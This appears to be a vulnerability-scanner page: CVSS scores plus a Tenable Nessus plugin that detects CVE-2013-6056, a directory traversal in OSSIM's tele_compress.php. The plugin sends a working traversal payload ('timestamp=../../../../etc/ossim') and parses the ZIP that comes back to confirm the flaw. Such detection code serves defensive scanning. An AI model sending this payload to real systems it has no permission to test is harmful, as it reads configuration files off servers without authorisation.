CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:C/I:N/A:N
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
EPSS
Percentile
64.7%
The OSSIM install hosted on the remote host has a directory traversal vulnerability. Input to the ‘timestamp’ parameter of the ‘/ossim/ocsreports/tele_compress.php’ script is not properly sanitized.
A remote attacker could exploit this to download arbitrary files, subject to the privileges under which the web server operates.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(76122);
script_version("1.6");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
script_cve_id("CVE-2013-6056");
script_bugtraq_id(62899);
script_name(english:"OSSIM tele_compress.php Directory Traversal");
script_summary(english:"Tries to download the contents of /etc/ossim");
script_set_attribute(attribute:"synopsis", value:
"An application hosted on the remote web server has a directory
traversal vulnerability.");
script_set_attribute(attribute:"description", value:
"The OSSIM install hosted on the remote host has a directory traversal
vulnerability. Input to the 'timestamp' parameter of the
'/ossim/ocsreports/tele_compress.php' script is not properly
sanitized.
A remote attacker could exploit this to download arbitrary files,
subject to the privileges under which the web server operates.");
script_set_attribute(attribute:"see_also", value:"http://forums.alienvault.com/discussion/comment/9407");
script_set_attribute(attribute:"solution", value:"Upgrade to OSSIM 4.3.3.1 or later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N");
script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"vuln_publication_date", value:"2013/10/08");
script_set_attribute(attribute:"patch_publication_date", value:"2013/10/11");
script_set_attribute(attribute:"plugin_publication_date", value:"2014/06/18");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("ossim_web_detect.nasl");
script_require_keys("www/ossim", "www/PHP");
script_require_ports("Services/www", 443);
exit(0);
}
include("audit.inc");
include("smb_func.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
include("bsal.inc");
include("zip.inc");
include("data_protection.inc");
get_kb_item_or_exit("www/ossim");
port = get_http_port(default:443, php:TRUE);
app_name = "AlienVault OSSIM";
install = get_install_from_kb(appname:'ossim', port:port, exit_on_fail:TRUE);
report_url = build_url(port:port, qs:install['dir']+'/');
payload = '/ocsreports/tele_compress.php?timestamp=../../../../etc/ossim';
url = install['dir'] + payload;
res = http_send_recv3(method:"GET", item:url, port:port, exit_on_fail:TRUE);
res_headers = parse_http_headers(status_line:res[0], headers:res[1]);
# Make sure the request was valid, otherwise the app isn't vulnerable,
# OCS was removed in later versions.
if (res_headers['$code'] != 200) audit(AUDIT_WEB_APP_NOT_AFFECTED, app_name, report_url);
# Make we sure got an attachment back.
pattern = "attachment;\s*filename=(\w+\.zip)";
match = eregmatch(string:res_headers['content-disposition'], pattern:pattern);
if (isnull(match)) audit(AUDIT_WEB_APP_NOT_AFFECTED, app_name, report_url);
filename = match[1];
# Parse the contents.
# First, get the directory name and remove it from the contents.
first_file_offset = stridx(res[2], "PK");
if (first_file_offset == -1) exit(1, "Failed to parse body of HTTP response containing " + filename + ".");
zip_dir = strip(left(res[2], first_file_offset));
zip_blob = right(res[2], strlen(res[2]) - first_file_offset);
zip_struct = zip_parse(blob:zip_blob);
if (isnull(zip_struct)) exit(1, "Failed to parse " + filename + " as a ZIP file.");
if (report_verbosity > 0)
{
trailer = NULL;
if (report_verbosity > 1)
{
trailer =
'\nWhich returned the file ' + filename + ' containing the contents of ' +
'\n' + zip_dir + ':' +
'\n';
foreach file (sort(keys(zip_struct['files']))) trailer += '\n - ' + data_protection::sanitize_user_full_redaction(output:file);
trailer += '\n';
}
report = get_vuln_report(items:url, port:port, trailer:trailer);
security_hole(port:port, extra:report);
}
else security_hole(port);
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:C/I:N/A:N
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
EPSS
Percentile
64.7%